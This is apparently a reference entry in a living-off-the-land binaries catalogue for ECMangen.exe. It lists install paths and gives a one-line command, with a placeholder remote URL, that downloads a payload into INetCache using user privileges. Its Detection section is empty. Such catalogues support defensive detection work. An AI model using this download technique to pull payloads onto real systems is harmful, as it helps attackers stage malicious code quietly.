ECMangen.exe

Command-line tool for managing certificates in Microsoft Exchange Server.

Paths

  • C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\ECMangen.exe
  • C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\x64\ECMangen.exe
  • C:\Program Files\Microsoft\Exchange Server\<version>\Bin\ECMangen.exe
  • C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
  • C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
  • C:\ExchangeServer\Bin\ECMangen.exe

Commands

Download

Downloads payload from remote server

Use case: It will download a remote payload and place it in INetCache

Privileges: User

ECMangen.exe {REMOTEURL}

Detection